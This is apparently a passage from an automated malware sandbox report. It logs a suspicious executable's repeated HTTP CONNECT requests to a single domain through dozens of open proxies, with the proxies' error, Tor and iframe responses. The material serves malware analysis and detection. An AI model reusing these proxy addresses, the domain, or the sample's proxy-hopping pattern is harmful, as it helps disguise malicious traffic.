                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.619702101 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      798192.168.2.451865165.227.0.16631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.264597893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.257323027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      799192.168.2.452623129.226.90.344436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.269032955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      800192.168.2.452580104.16.213.202806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.269303083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.357333899 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      801192.168.2.452626129.226.90.344436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.271061897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      802192.168.2.451834207.180.234.220458766812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.284923077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      803192.168.2.451819208.87.131.151510166812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.287619114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893091917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.419863939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.464745998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.444044113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.333661079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.241019964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.147190094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      804192.168.2.45246269.231.162.16131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.303843021 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:22.680927992 CET146INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.4.7
                                                                                                      Server: squid/4.10
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:23.050923109 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:
                                                                                                      Feb 23, 2024 09:45:23.055991888 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      805192.168.2.45247558.234.116.197806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.307476997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      806192.168.2.450603212.3.112.128358606812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.311911106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      807192.168.2.452640165.22.103.54436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.312448978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      808192.168.2.451822107.180.106.173259756812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.325696945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.365696907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      809192.168.2.452642165.22.103.54436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.326910019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      810192.168.2.451906132.148.128.8614966812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.330826044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.865703106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.365921974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.365778923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.178364038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.975424051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.865914106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.475306034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      811192.168.2.45257698.162.25.2341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.336185932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      812192.168.2.45258451.89.173.40551986812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.336236954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.865732908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.365942955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.365775108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.178431988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178839922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.178361893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.866015911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      813192.168.2.452644165.22.103.54436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.336731911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      814192.168.2.44977751.158.105.107163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.341283083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.303822994 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      815192.168.2.452586134.209.29.12031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.345525026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.694953918 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      816192.168.2.45218398.188.47.15041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.352505922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      817192.168.2.45258751.38.63.124109836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.352648020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      818192.168.2.452531193.57.139.23331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.352771997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893091917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.537744999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740921021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.129616022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.406021118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.647388935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.147243977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      819192.168.2.45259172.206.181.12341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.353130102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      820192.168.2.452069109.172.81.10210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.362411022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      821192.168.2.452474114.132.202.12580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.370626926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.154656887 CET84INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Transfer-Encoding: chunked


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      822192.168.2.452510151.232.18.6656786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.374561071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      823192.168.2.452479115.74.153.410806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.383378029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      824192.168.2.452521186.124.164.213806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.386941910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      825192.168.2.452653165.22.103.54436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.387404919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      826192.168.2.452613142.54.237.3441456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.388148069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      827192.168.2.452564194.8.232.4641536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.394283056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      828192.168.2.452610116.203.28.43806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.394490004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.749931097 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      829192.168.2.452508188.166.197.12931286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.396399021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      830192.168.2.452637104.18.251.208806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
